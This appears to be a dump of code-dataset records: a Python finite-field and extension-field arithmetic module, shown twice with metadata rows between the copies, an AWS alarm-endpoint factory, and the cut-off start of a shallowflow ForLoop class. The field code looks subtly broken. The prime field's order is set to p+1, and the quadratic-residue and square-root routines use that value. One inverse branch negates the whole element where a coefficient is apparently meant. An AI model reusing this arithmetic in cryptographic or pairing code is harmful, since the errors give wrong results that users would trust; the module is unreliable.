# deg(a)<deg(b)
return izero, a # quotient is zero, remain is a
elif da==db:
#deg(a)=deg(b)
deg = max(d-1,da)
rc = [zero]*(deg)
qc = [zero]*(deg)
q = A[n]/B[m]
for i in range(1,deg):
rc[i] = A[n+i]-q*B[m+i]
qc[deg-1] = q
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
else :
# deg(a)>deg(b)
deg = max(d-1,da)
p = deg - da
rc = [zero]*(deg)
qc = [zero]*(deg)
rc[deg-da:] = A[n:]
pm=0
while p+pm+db<deg+1:
#k is the position of the index of the quotient
k = deg-(da-db)-1+pm
qc[k] = rc[p+pm]/B[m]
for i in range(db):
rc[i+p+pm] = rc[i+p+pm]- qc[k]*B[m+i]
pm=pm+1
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
def reduc(self,a):
''' Return a % self.irpoly
The polynomial a = [a_0,...,a_n-1] is returned modulo the irreducible polynomial
The reduced polynomial has length at most d-1 where d is the length
of the irreducible polynomial
'''
assert a.F.F == self.F
if a.poly.iszero() :
return self.zero()
elif a.poly == self.irpoly :
return self.zero()
elif a.deg < self.deg :
c = [self.F.zero()]*(self.deg-1-a.deg)
newacoef = c+a.poly.coef
newapoly= polynom(self.F, newacoef)
newaelem = ExtensionFieldElem(self, newapoly)
return newaelem
else :
# Case where a is not zero or the irreducible polynomial and deg(a)>=deg(irpoly)
q,r = self.eucldiv(a,ExtensionFieldElem(self,self.irpoly))
r = self.trunc(r)
return self.reduc(r)
def reduc2(self,a):
''' a is a list of length (d-1)*2-1 (polynomial length)
this method returns the equivalent element of length d-1
        using the table of equivalences (built from the irreducible polynomial)
in the function self.table()
'''
As = a[:(self.deg-2)]
Ad = a[(self.deg-2):]
b = list(dot(As,self.tabular)+Ad)
newapoly = polynom(self.F,b)
newa = ExtensionFieldElem(self,newapoly)
return newa
def trunc(self,a):
'''Return an ExtensionFieldElem of length d-1 where d = deg(irpoly)
'''
d = self.deg
if a.deg == d-1:
return a
c = a.poly.coef[a.deg-d+1:] # the (d-1) last elements of a
cp = polynom(self.F,c)
return ExtensionFieldElem(self,cp)
def table(self):
''' This method returns a table (usually) stored in self.tabular
which is used to compute reduction after a multiplication
between two elements
'''
d = self.deg
T = zeros((d-2,d-1),dtype=object_)
Pc = self.irpoly.coef[1:]
for i in range(0,d-2):
Qc = [self.F.zero()]*(2*(d-1)-1)
Qc[i+1:i+d] = Pc
Qp = polynom(self.F,Qc)
Qe = ExtensionFieldElem(self,Qp)
Q = self.reduc(-Qe)
T[i] = array(Q.poly.coef)
return T
def extendedeuclide(self,a,b):
        '''Return s,u,v such that s = ua + vb, where s is the gcd of a and b
This method is used to compute the inverse of a mod b (when s=1)
'''
#init
one = self.one()
zero = self.zero()
s = a
u = one
v = zero
sp = b
up = zero
vp = one
#loop : invariants are s = ua+vb and sp = up*a+vp*b
while not sp.poly.iszero() :
q,r = self.eucldiv(s,sp)
s,u,v,sp,up,vp = sp, up, vp, r, u-up*q,v-vp*q
return self.reduc(s),self.reduc(u),self.reduc(v)
def __str__(self):
return str(self.F)+"/"+str(self.irpoly)
def jsonable(self):
return {'type': 'Field Extension', 'F': self.F, 'irpoly': self.irpoly, 'degree':self.deg-1}
class ExtensionFieldElem(FieldElem):
def __init__(self,F,poly):
'''Define the Extension Field and the representative polynomial
'''
self.F = F
self.poly = poly
self.siz = len(poly.coef)
self.deg = self.siz
def __str__(self):
x = self.F.rep
p = self.poly
s = '('
if self.siz == 1 :
s = s+str(p.coef[0])
if self.siz == 2 :
s = s+str(p.coef[0])+'*'+x+' + '+str(p.coef[1])
if self.siz > 2 :
s =s+str(p.coef[0])+'*'+x+'**'+str(self.siz-1)
for i in range(1,self.siz-2):
s = s+' + '+str(p.coef[i])+'*'+x+'**'+str(self.siz-1-i)
s = s+' + '+str(p.coef[self.siz-2])+'*'+x +' + '+str(p.coef[self.siz-1])
return s+')'
def __eq__(self,other):
try:
return self.F == other.F and self.poly == other.poly
except:
return False
def fingerprint(self):
return self.poly.fingerprint()
def jsonable(self):
return {'type': 'ExtensionFieldElem', 'F': self.F, 'poly': self.poly, 'size': self.siz}
class polynom:
''' This class represents a polynomial written P = c_nX**n+...c_1X+c_0
c_0,...,c_n are in the Field F (which can be an ExtensionField) so they are either FieldElem or ExtensionFieldElem
coef is a list : coef = [c_n,...,c_0] of length n+1
'''
def __init__(self,F,coef):
        self.F = F # The field in which coefficients belong
if isinstance(coef,list):
            self.coef = coef # A list of coefficients in decreasing order (by convention) of the polynomial's degree
self.deg = len(coef) # The degree+1 of the polynomial
else :
#coef is not a list but a single element
self.coef = [coef]
self.deg = 1
def __eq__(self,other):
try:
return (self.F == other.F and self.coef == other.coef)
except:
return False
def __str__(self):
# Not consistent with representation letter of the fields
x = self.F.rep
if x == None:
x = 'X'
s = '('
if self.deg == 1 :
s = s+str(self.coef[0])
if self.deg == 2 :
s = s+str(self.coef[0])+'*'+x+' + '+str(self.coef[1])
if self.deg > 2 :
s =s+str(self.coef[0])+'*'+x+'**'+str(self.deg-1)
for i in range(1,self.deg-2):
s = s+' + '+str(self.coef[i])+'*'+x+'**'+str(self.deg-1-i)
s = s+' + '+str(self.coef[self.deg-2])+'*'+x +' + '+str(self.coef[self.deg-1])
return s+')'
def fingerprint(self):
L = []
for c in self.coef:
L.append(c.fingerprint())
return fingexp.fingerprint(L)
def iszero(self):
'''Return True if it is a zero polynomial (each coefficient is zero)
This does not return True if the polynomial is the polynomial that generates the extension field
'''
cond = True
for i in self.coef:
pcond = i.iszero()
cond = pcond*cond
return cond
def truedeg(self):
'''Return the position of the first non zero coefficient and the actual degree of the polynomial
'''
if self.iszero():
return 0,0
n = 0
while self.coef[n]==self.F.zero():
n = n+1
# n is the position of the first non zero coeff of the polynomial
return n, self.deg-n # position and actual degree of the polynomial
def jsonable(self):
return {'type': 'polynomial', 'F': self.F, 'coeficients': self.coef, 'degree': self.deg}
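# --- Illustrative sketch (added; not part of the original module) ---
# Building Fp2 = Fp[X]/(X**2+1) with the classes above. The prime 103 is an
# arbitrary example (103 = 3 mod 4, so X**2+1 is irreducible); rep='A' follows
# the convention mentioned in the ExtensionField docstring.
def _fp2_demo():
    Fp = Field(103)
    irpoly = polynom(Fp, [Fp.one(), Fp.zero(), Fp.one()])   # X**2 + 1
    Fp2 = ExtensionField(Fp, irpoly, rep='A')
    u = Fp2.unit()               # the root of X**2+1, i.e. "i"
    return u * u == -Fp2.one()   # expected to be True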
| 33.584054
| 132
| 0.494208
|
from numpy import *
import gmpy
from Crypto.Random.random import randint
import random as rd
import tools.fingexp as fingexp
import tools.utils as utils
class Field(fingexp.FingExp):
def __init__(self,p):
self.F = self
self.p = gmpy.mpz(p)
self.char = self.p
        self.q = self.p+1
        assert gmpy.is_prime(p)
self.rep = None
self.g = None
self.to_fingerprint = ["p"]
self.to_export = {"fingerprint": [],"value": ["p"]}
super(Field, self).__init__()
def load(self, data, fingerprints):
self.p = utils.b64tompz(data["p"])
def one(self):
return FieldElem(1, self)
def zero(self):
return FieldElem(0,self)
def elem(self,x):
if isinstance(x,FieldElem):
assert x.F == self
return x
m = gmpy.mpz(1)
assert isinstance(x,int) or isinstance(x, long) or type(x)==type(m)
return FieldElem(x,self)
def random(self,low=1,high=None):
if high == None :
high = int(self.p-1)
rand = randint(low,high)
return self.elem(rand)
def __eq__(self, other):
try:
return (self.p == other.p)
except:
return False
def add(self, a, b):
return FieldElem((a.val + b.val) % self.p, self)
def sub(self, a, b):
return FieldElem((a.val - b.val) % self.p, self)
def neg(self, a):
return FieldElem((self.p - a.val ) % self.p, self)
def mul(self, a, b):
if not isinstance(b,FieldElem) :
if b<0:
return self.smul(-a,-b)
return self.smul(a,b)
else:
return self.pmul(a,b)
def smul(self,a,b):
if not isinstance(b,FieldElem):
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
else :
return self.smul(b,a)
def sm(self,b,a):
return FieldElem((gmpy.mpz(b)*a.val)%(self.p),self)
def pmul(self,a,b):
return FieldElem((a.val * b.val) % self.p, self)
def dbleAndAdd(self,P,Pp,n):
if n == 0 :
return self.zero();
if n == 1 :
return P
elif n%2 == 1 :
Q = self.dbleAndAdd(P,Pp,(n-1)/2)
return P+Q+Q
elif n%2 == 0 :
Q = self.dbleAndAdd(P,Pp,n/2)
return Q+Q
def powop(self, a, b):
m = gmpy.mpz(1)
if not isinstance(b, int) and not isinstance(b, long) and not type(b)==type(m):
raise Exception("Exponentation by a non integer, long or mpz")
c = b
if c > self.char-1 or c<0:
c = b%(self.char-1)
if c == 0 :
assert not a.val%self.char == 0
return self.one()
elif c == 1 :
return a
else :
return self.sqrtAndMultply(a,a, c)
def sqrtAndMultply(self,P,Pp,n):
if n == 0 :
return self.one()
elif n == 1 :
return P
elif n%2 == 1 :
Q = self.sqrtAndMultply(P,Pp,(n-1)/2)
return P*self.square(Q)
elif n%2 == 0 :
Q = self.sqrtAndMultply(P,Pp,n/2)
return self.square(Q)
def square(self,a):
return FieldElem(pow(a.val,2, self.p), self)
def invert(self,a):
assert not (a.val%self.p == 0)
return FieldElem(gmpy.invert(a.val, self.p), self)
def div(self,a,b):
assert not (b.val%self.p == 0)
return FieldElem((a.val*self.invert(b).val % self.p),self)
def findnonresidue(self):
g=self.random()
while g.isquadres():
g = self.random()
return g
def __str__(self):
return "F_"+str(self.p)
def jsonable(self):
return {'type': 'FqField', 'p': self.p}
class FieldElem():
def __init__(self, val, F):
self.F = F
self.val = gmpy.mpz(val)
self.poly = polynom(self.F,[self])
def __eq__(self, other):
try:
return ((self.val%self.F.char) == (other.val%self.F.char) and self.F == other.F)
except:
return False
def __add__(self, other):
return self.F.add(self, other)
def __neg__(self):
return self.F.neg(self)
def __sub__(self, other):
return self.F.sub(self, other)
def __radd__(self, other):
return self.__add__(other)
def __mul__(self, other):
return self.F.mul(self, other)
def __rmul__(self, other):
return self.__mul__(other)
def __pow__(self, e):
return self.F.powop(self, e)
def __div__(self,other):
return self.F.div(self,other)
def __truediv__(self,other):
return self.F.div(self,other)
def __str__(self):
return str(self.val)
def iszero(self):
return self == self.F.zero()
def invert(self):
return self.F.invert(self)
def invertible(self):
return self.F.invertible(self)
def isquadres(self):
if (self+self.F.zero()).iszero() :
return False
else :
c = self**((self.F.q-1)/2)
return c==self.F.one()
def squareroot(self):
g = self.F.g
if g == None :
g = self.F.findnonresidue()
self.F.g = g
q = self.F.q
s=0
t=self.F.q-1
while t%2==0:
s=s+1
t=t/2
e = 0
for i in range(2,s+1):
b = 2**(i-1)
b1 = b*2
c = ((self)*(g**(-e)))**((q-1)/b1)
if not c==self.F.one() :
e = e+b
h = self*(g**(-e))
b = (g**(e/2))*(h**((t+1)/2))
assert b**2 == self
return b
def fingerprint(self):
return fingexp.fingerprint(self.val)
def jsonable(self):
return {'type': 'FieldElem', 'F': self.F, 'val': self.val}
class ExtensionField(Field):
def __init__(self,F,irpoly,g=None,rep=None):
self.F = F
self.irpoly = irpoly
self.deg = len(irpoly.coef)
assert self.deg > 0
self.q = self.F.q**(self.deg-1)
self.tabular = self.table()
if rep == None :
self.rep = rd.choice(['B','C','D','E','F','G','H','J','K','L'])
else :
self.rep = rep
self.char = F.char
self.primefield = gmpy.is_prime(self.char)
self.g = g
self.to_fingerprint = ["F","irpoly"]
self.to_export = {"fingerprint": [],"value": ["F","irpoly"]}
def one(self):
One = [self.F.zero()]*(self.deg-1)
One[self.deg-2]= self.F.one()
return ExtensionFieldElem(self,polynom(self.F,One))
def zero(self):
Zero = [self.F.zero()]*(self.deg-1)
return ExtensionFieldElem(self,polynom(self.F,Zero))
def unit(self):
I = self.zero()
I.poly.coef[-2]=self.F.one()
return I
def elem(self,x):
P = self.zero()
P.poly.coef[-1] = x
return P
def random(self):
polycoef = [0]*(self.deg-1)
for i in range(self.deg-1):
polycoef[i] = self.F.random()
poly = polynom(self.F,polycoef)
return ExtensionFieldElem(self,poly)
def __eq__(self, other):
try:
return (self.F == other.F and self.irpoly == other.irpoly)
except:
return False
def add(self, a, b):
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
polysum = [0]*a.deg
for i in range(a.deg):
polysum[i]=a.poly.coef[i]+b.poly.coef[i]
P = polynom(self.F,polysum)
return ExtensionFieldElem(self,P)
def sub(self, a, b):
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
c = self.neg(b)
return self.add(a,c)
def neg(self, a):
ap = [0]*a.deg
for i in range(a.deg):
ap[i] = -a.poly.coef[i]
P = polynom(self.F,ap)
return ExtensionFieldElem(self,P)
def smul(self,a,b):
if not isinstance(b,FieldElem):
A = a.poly.coef
Pc = [0]*len(A)
for i in range(len(Pc)):
Pc[i] = A[i]*gmpy.mpz(b)
return ExtensionFieldElem(self,polynom(self.F,Pc))
else :
return self.smul(b,a)
def pmul(self,a,b):
if not a.deg == b.deg :
a = self.reduc(a)
b = self.reduc(b)
A = a.poly.coef
B = b.poly.coef
k = self.deg-1
if k == 2 and self.F.rep =='A':
a0,a1,b0,b1 = A[0].val,A[1].val,B[0].val,B[1].val
p = self.char
v0 = a0*b0
v1 = a1*b1
c0 = ((a0+a1)*(b0+b1)-v0-v1)%p
c1 = (v1-v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c0e,c1e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
a0 = A[0]
a1 = A[1]
b0 = B[0]
b1 = B[1]
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,b0)
v1 = self.F.pmul(a1,b1)
c0 = self.F.pmul((a0+a1),(b0+b1))-v0-v1
c1 = v1 + self.F.pmul(v0,beta)
cp = polynom(self.F,[c0,c1])
C = ExtensionFieldElem(self,cp)
return C
elif k == 3:
a0,a1,a2 = A
b0,b1,b2 = B
beta = -self.irpoly.coef[-1]
v0,v1,v2 = self.F.pmul(a0,b0), self.F.pmul(a1,b1), self.F.pmul(a2,b2)
c0 = self.F.pmul((a0+a2),(b0+b2))-v0+v1-v2
c1 = self.F.pmul((a2+a1),(b2+b1))-v2-v1+self.F.pmul(beta,v0)
c2 = v2+self.F.pmul(beta,(self.F.pmul((a1+a0),(b1+b0))-v1-v0))
cp = polynom(self.F,[c0,c1,c2])
C = ExtensionFieldElem(self,cp)
return C
else :
prod = convolve(A,B)
return self.reduc2(prod)
def square(self,a):
assert a.F == self
if not a.deg == self.deg-1 :
a = self.reduc(a)
A = a.poly.coef
k = self.deg-1
if k == 2 and self.F.rep == 'A':
a1, a0 = A[0].val,A[1].val
p = self.char
v0 = a0*a1
c0 = ((a0+a1)*(a0-a1))%p
c1 = (v0+v0)%p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
cp = polynom(self.F,[c1e,c0e])
C = ExtensionFieldElem(self,cp)
return C
elif k == 2:
a1, a0 = A
beta = -self.irpoly.coef[-1]
v0 = self.F.pmul(a0,a1)
c0 = self.F.pmul((a0+a1),(a0+self.F.pmul(a1,beta)))-v0-self.F.pmul(beta,v0)
c1 = v0+v0
cp = polynom(self.F,[c1,c0])
return ExtensionFieldElem(self,cp)
elif k == 3:
a2,a1,a0 = A
assert a0.F == self.F
beta = -self.irpoly.coef[-1]
s0 = self.F.square(a0)
t1 = self.F.pmul(a0,a1)
s1 = t1+t1
s2 = self.F.square((a0-a1+a2))
t3 = a1*a2
s3 = t3+t3
s4 = self.F.square(a2)
c0 = s0 + self.F.pmul(beta,s3)
c1 = s1 + self.F.pmul(beta,s4)
c2 = s1 + s2 + s3 - s0 -s4
cp = polynom(self.F,[c2,c1,c0])
return ExtensionFieldElem(self,cp)
else :
return self.F.pmul(a,a)
def invert(self,a):
k = self.deg-1
if k == 2 and self.F.rep == 'A':
A = a.poly.coef
a1,a0 = A[0].val,A[1].val
p = self.char
norm = a0*a0+a1*a1
invnorm = gmpy.invert(norm,p)
c0 = (a0*invnorm) % p
c1 = (-a1*invnorm) % p
c0e = FieldElem(c0,self.F)
c1e = FieldElem(c1,self.F)
invap = polynom(self.F,[c1e,c0e])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 2 :
A = a.poly.coef
a1,a0 = A[0],A[1]
mod = self.irpoly.coef[-1]
a12 = self.F.square(a1)
mid = self.F.pmul(a12,mod)
norm = self.F.square(a0)+mid
invnorm = self.F.invert(norm)
c = self.F.pmul(a0,invnorm)
d = -self.F.pmul(a1,invnorm)
invap = polynom(self.F,[d,c])
inva = ExtensionFieldElem(self,invap)
return inva
elif k == 3 :
A = a.poly.coef
a2,a1,a0 = A[0],A[1],A[2]
mod = -self.irpoly.coef[-1]
z0 = self.F.zero()
z1 = self.F.one()
if a0 == z0:
if a1 == z0:
c0,c1,c2 = z0, self.F.invert(self.F.pmul(a2,mod)), z0
elif a2 == z0:
c0,c1,c2 = z0,z0,self.F.invert(self.F.pmul(a1,mod))
else :
a22 = self.F.square(a2)
a12 = self.F.square(a1)
c2 = self.F.pmul(a12,self.F.invert((self.F.pmul(self.F.pmul(a22,a2),mod)+self.F.pmul(self.F.pmul(a12,a1),mod))))
c1 = self.F.pmul((z1-self.F.pmul(self.F.pmul(a1,c2),mod)),self.F.invert(self.F.pmul(a2,mod)))
c0 = self.F.pmul((-(self.F.pmul(self.F.pmul(a2,mod),c2))),self.F.invert(a1))
else :
if a1 == z0 and a2 == z0:
c0,c1,c2 = self.F.invert(a0),z0,z0
else :
a12 = self.F.pmul(a1,a2)
a12m = self.F.pmul(a12,mod)
a00 = self.F.square(a0)
abis = a00-a12m
if abis == z0:
a11 = self.F.square(a1)
a22 = self.F.square(a2)
a02 = self.F.pmul(a0,a2)
a01 = self.F.pmul(a0,a1)
c2 = self.F.pmul(-a,self.F.invert(self.F.pmul((a02-a11),mod)))
c1 = self.F.pmul(-a2,self.F.invert(a01-self.F.pmul(a22,mod)))
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul((z1-self.F.pmul(a1c2+a2c1,mod)),self.F.invert(a0))
else :
if a1 == z0:
inva0 = self.F.invert(a0)
a02 = self.F.pmul(a0,a2)
a000 = self.F.pmul(a00,a0)
a22 = self.F.square(a2)
a222 = self.F.pmul(a22,a2)
mm = self.F.square(mod)
a222mm = self.F.pmul(a222,mm)
c2 = self.F.pmul(-a02,self.F.invert(a000+a222mm))
a02m = self.F.pmul(a02,mod)
a02mc2 = self.F.pmul(a02m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(-a02mc2,inva00)
a2m = self.F.pmul(a2,mod)
a2mc1 = self.F.pmul(a2m,c1)
c0 = self.F.pmul(z1-a2mc1,inva0)
elif a2 == z0:
a11 = self.F.square(a1)
a111 = self.F.pmul(a11,a1)
a000 = self.F.pmul(a00,a0)
a111m = self.F.pmul(a111,mod)
inva0 = self.F.invert(a0)
c2 = self.F.pmul(a11,self.F.invert(a111m+a000))
a11m = self.F.pmul(a11,mod)
a11mc2 = self.F.pmul(a11m,c2)
inva00 = self.F.square(inva0)
c1 = self.F.pmul(a11mc2-a1,inva00)
a1m = self.F.pmul(a1,mod)
a1mc2 = self.F.pmul(a1m,c2)
c0 = self.F.pmul(z1-a1mc2,inva0)
else :
a01 = self.F.pmul(a0,a1)
a22 = self.F.square(a2)
a22m = self.F.pmul(a22,mod)
a02 = self.F.pmul(a0,a2)
a11 = self.F.square(a1)
abus = a01-a22m
abos = self.F.pmul(a02-a11,mod)
invabis = self.F.invert(abis)
abb = self.F.pmul(abus,invabis)
abb1 = self.F.pmul(abb,a1)
abbbos = self.F.pmul(abb,abos)
c2 = self.F.pmul(abb1-a2,self.F.invert(abis-abbbos))
abosc2 = self.F.pmul(abos,c2)
c1 = self.F.pmul(-a1-abosc2,invabis)
a1c2 = self.F.pmul(a1,c2)
a2c1 = self.F.pmul(a2,c1)
c0 = self.F.pmul(z1-self.F.pmul(a1c2+a2c1,mod),self.F.invert(a0))
invap = polynom(self.F,[c2,c1,c0])
inva = ExtensionFieldElem(self,invap)
return inva
else :
P = ExtensionFieldElem(self,self.irpoly)
r,u,v = self.extendedeuclide(P,a)
n,d = r.poly.truedeg()
assert n == self.deg-2
c = r.poly.coef[len(r.poly.coef)-1].invert()
cp = polynom(self.F,[c])
ce = ExtensionFieldElem(self,cp)
return ce*v
def invertible(self,a):
return not self.reduc(a)==self.zero()
def div(self,a,b):
return a*self.invert(b)
def eucldiv(self,a,b):
zero = self.F.zero()
izero = self.zero()
d = self.deg
assert not b.poly.iszero() # Do not divide by zero
if a.poly.iszero() :
return izero, izero # quotient is zero, remain is zero
elif a == b:
return self.one(), izero # quotient is one, remain is zero
#Notations
A = a.poly.coef
B = b.poly.coef
n, da = a.poly.truedeg() # position of first non zero elem of a and degree of a
m, db = b.poly.truedeg() # same for b
if da<db :
# deg(a)<deg(b)
return izero, a # quotient is zero, remain is a
elif da==db:
#deg(a)=deg(b)
deg = max(d-1,da)
rc = [zero]*(deg)
qc = [zero]*(deg)
q = A[n]/B[m]
for i in range(1,deg):
rc[i] = A[n+i]-q*B[m+i]
qc[deg-1] = q
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
else :
# deg(a)>deg(b)
deg = max(d-1,da)
p = deg - da
rc = [zero]*(deg)
qc = [zero]*(deg)
rc[deg-da:] = A[n:]
pm=0
while p+pm+db<deg+1:
#k is the position of the index of the quotient
k = deg-(da-db)-1+pm
qc[k] = rc[p+pm]/B[m]
for i in range(db):
rc[i+p+pm] = rc[i+p+pm]- qc[k]*B[m+i]
pm=pm+1
rp = polynom(self.F,rc)
qp = polynom(self.F,qc)
remain = ExtensionFieldElem(self,rp)
quotient = ExtensionFieldElem(self,qp)
return quotient, remain
def reduc(self,a):
assert a.F.F == self.F
if a.poly.iszero() :
return self.zero()
elif a.poly == self.irpoly :
return self.zero()
elif a.deg < self.deg :
c = [self.F.zero()]*(self.deg-1-a.deg)
newacoef = c+a.poly.coef
newapoly= polynom(self.F, newacoef)
newaelem = ExtensionFieldElem(self, newapoly)
return newaelem
else :
# Case where a is not zero or the irreducible polynomial and deg(a)>=deg(irpoly)
q,r = self.eucldiv(a,ExtensionFieldElem(self,self.irpoly))
r = self.trunc(r)
return self.reduc(r)
def reduc2(self,a):
As = a[:(self.deg-2)]
Ad = a[(self.deg-2):]
b = list(dot(As,self.tabular)+Ad)
newapoly = polynom(self.F,b)
newa = ExtensionFieldElem(self,newapoly)
return newa
def trunc(self,a):
d = self.deg
if a.deg == d-1:
return a
c = a.poly.coef[a.deg-d+1:] # the (d-1) last elements of a
cp = polynom(self.F,c)
return ExtensionFieldElem(self,cp)
def table(self):
d = self.deg
T = zeros((d-2,d-1),dtype=object_)
Pc = self.irpoly.coef[1:]
for i in range(0,d-2):
Qc = [self.F.zero()]*(2*(d-1)-1)
Qc[i+1:i+d] = Pc
Qp = polynom(self.F,Qc)
Qe = ExtensionFieldElem(self,Qp)
Q = self.reduc(-Qe)
T[i] = array(Q.poly.coef)
return T
def extendedeuclide(self,a,b):
#init
one = self.one()
zero = self.zero()
s = a
u = one
v = zero
sp = b
up = zero
vp = one
#loop : invariants are s = ua+vb and sp = up*a+vp*b
while not sp.poly.iszero() :
q,r = self.eucldiv(s,sp)
s,u,v,sp,up,vp = sp, up, vp, r, u-up*q,v-vp*q
return self.reduc(s),self.reduc(u),self.reduc(v)
def __str__(self):
return str(self.F)+"/"+str(self.irpoly)
def jsonable(self):
return {'type': 'Field Extension', 'F': self.F, 'irpoly': self.irpoly, 'degree':self.deg-1}
class ExtensionFieldElem(FieldElem):
def __init__(self,F,poly):
self.F = F
self.poly = poly
self.siz = len(poly.coef)
self.deg = self.siz
def __str__(self):
x = self.F.rep
p = self.poly
s = '('
if self.siz == 1 :
s = s+str(p.coef[0])
if self.siz == 2 :
s = s+str(p.coef[0])+'*'+x+' + '+str(p.coef[1])
if self.siz > 2 :
s =s+str(p.coef[0])+'*'+x+'**'+str(self.siz-1)
for i in range(1,self.siz-2):
s = s+' + '+str(p.coef[i])+'*'+x+'**'+str(self.siz-1-i)
s = s+' + '+str(p.coef[self.siz-2])+'*'+x +' + '+str(p.coef[self.siz-1])
return s+')'
def __eq__(self,other):
try:
return self.F == other.F and self.poly == other.poly
except:
return False
def fingerprint(self):
return self.poly.fingerprint()
def jsonable(self):
return {'type': 'ExtensionFieldElem', 'F': self.F, 'poly': self.poly, 'size': self.siz}
class polynom:
def __init__(self,F,coef):
        self.F = F # The field in which coefficients belong
if isinstance(coef,list):
            self.coef = coef # A list of coefficients in decreasing order (by convention) of the polynomial's degree
self.deg = len(coef)
else :
self.coef = [coef]
self.deg = 1
def __eq__(self,other):
try:
return (self.F == other.F and self.coef == other.coef)
except:
return False
def __str__(self):
x = self.F.rep
if x == None:
x = 'X'
s = '('
if self.deg == 1 :
s = s+str(self.coef[0])
if self.deg == 2 :
s = s+str(self.coef[0])+'*'+x+' + '+str(self.coef[1])
if self.deg > 2 :
s =s+str(self.coef[0])+'*'+x+'**'+str(self.deg-1)
for i in range(1,self.deg-2):
s = s+' + '+str(self.coef[i])+'*'+x+'**'+str(self.deg-1-i)
s = s+' + '+str(self.coef[self.deg-2])+'*'+x +' + '+str(self.coef[self.deg-1])
return s+')'
def fingerprint(self):
L = []
for c in self.coef:
L.append(c.fingerprint())
return fingexp.fingerprint(L)
def iszero(self):
cond = True
for i in self.coef:
pcond = i.iszero()
cond = pcond*cond
return cond
def truedeg(self):
if self.iszero():
return 0,0
n = 0
while self.coef[n]==self.F.zero():
n = n+1
return n, self.deg-n
def jsonable(self):
return {'type': 'polynomial', 'F': self.F, 'coeficients': self.coef, 'degree': self.deg}
| true
| true
|
790b28543a58805c78207912115bb3764bd5ceb4
| 1,452
|
py
|
Python
|
src/spacel/provision/app/alarm/endpoint/factory.py
|
mycloudandme/spacel-provision
|
900b8ada0017f727163c5c2ae464e17d747ba0e8
|
[
"MIT"
] | 2
|
2016-05-18T11:10:27.000Z
|
2016-05-18T13:25:04.000Z
|
src/spacel/provision/app/alarm/endpoint/factory.py
|
mycloudandme/spacel-provision
|
900b8ada0017f727163c5c2ae464e17d747ba0e8
|
[
"MIT"
] | null | null | null |
src/spacel/provision/app/alarm/endpoint/factory.py
|
mycloudandme/spacel-provision
|
900b8ada0017f727163c5c2ae464e17d747ba0e8
|
[
"MIT"
] | null | null | null |
import logging
logger = logging.getLogger('spacel.provision.app.alarm.endpoint.factory')
class AlarmEndpointFactory(object):
def __init__(self, factories):
self._factories = factories
def add_endpoints(self, template, endpoints):
endpoint_resources = {}
logger.debug('Injecting %d endpoints.', len(endpoints))
for name, params in endpoints.items():
factory = self._factory_for_type(params, name)
if not factory:
continue
actions = factory.add_endpoints(template, name, params)
if actions:
endpoint_resources[name] = {
'name': factory.resource_name(name),
'actions': actions
}
else:
logger.debug('Endpoint %s was invalid.', name)
if endpoint_resources:
logger.debug('Built endpoints: %s', endpoint_resources)
return endpoint_resources
def _factory_for_type(self, params, name):
endpoint_type = params.get('type')
if not endpoint_type:
logger.warning('Endpoint %s is missing "type".', name)
return None
factory = self._factories.get(endpoint_type)
if not factory:
logger.warning('Endpoint %s has invalid "type". Valid types: %s',
name, sorted(self._factories.keys()))
return None
return factory
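# --- Illustrative sketch (added; not part of the original module) ---
# The concrete endpoint factory below is an assumption made for illustration,
# not spacel-provision's real API; it only mirrors the interface used above
# (resource_name(name) and add_endpoints(template, name, params)).
class _ExampleEmailFactory(object):
    def resource_name(self, name):
        return 'EmailTopic%s' % name
    def add_endpoints(self, template, name, params):
        # A real factory would inject resources into `template` here.
        return ['NotifyOpsAction']
def _alarm_factory_demo(template):
    factory = AlarmEndpointFactory({'email': _ExampleEmailFactory()})
    return factory.add_endpoints(template, {'ops': {'type': 'email'}})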
| 33.767442
| 77
| 0.587466
|
import logging
logger = logging.getLogger('spacel.provision.app.alarm.endpoint.factory')
class AlarmEndpointFactory(object):
def __init__(self, factories):
self._factories = factories
def add_endpoints(self, template, endpoints):
endpoint_resources = {}
logger.debug('Injecting %d endpoints.', len(endpoints))
for name, params in endpoints.items():
factory = self._factory_for_type(params, name)
if not factory:
continue
actions = factory.add_endpoints(template, name, params)
if actions:
endpoint_resources[name] = {
'name': factory.resource_name(name),
'actions': actions
}
else:
logger.debug('Endpoint %s was invalid.', name)
if endpoint_resources:
logger.debug('Built endpoints: %s', endpoint_resources)
return endpoint_resources
def _factory_for_type(self, params, name):
endpoint_type = params.get('type')
if not endpoint_type:
logger.warning('Endpoint %s is missing "type".', name)
return None
factory = self._factories.get(endpoint_type)
if not factory:
logger.warning('Endpoint %s has invalid "type". Valid types: %s',
name, sorted(self._factories.keys()))
return None
return factory
| true
| true
|
790b288e1719545deb4204457f8c3a871ba6ca5d
| 2,016
|
py
|
Python
|
base/src/shallowflow/base/sources/_ForLoop.py
|
waikato-datamining/shallow-flow
|
3f1d99921e5138598eb164edeb1d23e6f199501c
|
[
"MIT"
] | null | null | null |
base/src/shallowflow/base/sources/_ForLoop.py
|
waikato-datamining/shallow-flow
|
3f1d99921e5138598eb164edeb1d23e6f199501c
|
[
"MIT"
] | 2
|
2021-08-18T22:00:08.000Z
|
2021-08-18T22:00:47.000Z
|
base/src/shallowflow/base/sources/_ForLoop.py
|
waikato-datamining/shallowflow
|
3f1d99921e5138598eb164edeb1d23e6f199501c
|
[
"MIT"
] | null | null | null |
from shallowflow.api.source import AbstractListOutputSource
from shallowflow.api.config import Option
class ForLoop(AbstractListOutputSource):
"""
Outputs an integer from the specified range.
"""
